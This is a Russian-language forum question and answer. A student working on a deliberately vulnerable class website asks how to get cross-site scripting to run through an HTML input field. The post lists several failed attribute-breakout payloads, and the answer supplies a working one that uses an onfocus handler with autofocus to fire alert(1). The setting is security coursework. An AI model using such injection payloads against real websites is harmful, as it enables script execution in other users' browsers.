Как запустить код XSS в поле ввода HTML? - PullRequest
0 голосов
/ 11 сентября 2018

Я работаю над попыткой найти уязвимости на фальшивом веб-сайте для класса, и мне было интересно, как запустить код XSS в это поле ввода?

  • Это код с веб-сайта:
<form name="friendForm" method="POST" action="/Tunestore/addfriend.do">
  Friend name: <input type="text" name="friend" value="&quot
    <script>alert(1)</script>"><br>
  <input type="submit" value="Submit">
</form>
  • Я пробовал это, но это не сработало:

    "> <script>alert(1)</script>

    " onfocus="alert(1)"

    " onclick="alert(1)

1 Ответ

0 голосов
/ 11 сентября 2018

Попробуйте это:

"onfocus =" alert (1) "autofocus ="

Это расширится до: <'input type = "text" name = "friend" value ="" onfocus = "alert (1)" autofocus = "" />

, который вызовет окно с предупреждением, демонстрирующее XSS.

Добро пожаловать на сайт PullRequest, где вы можете задавать вопросы и получать ответы от других членов сообщества.
...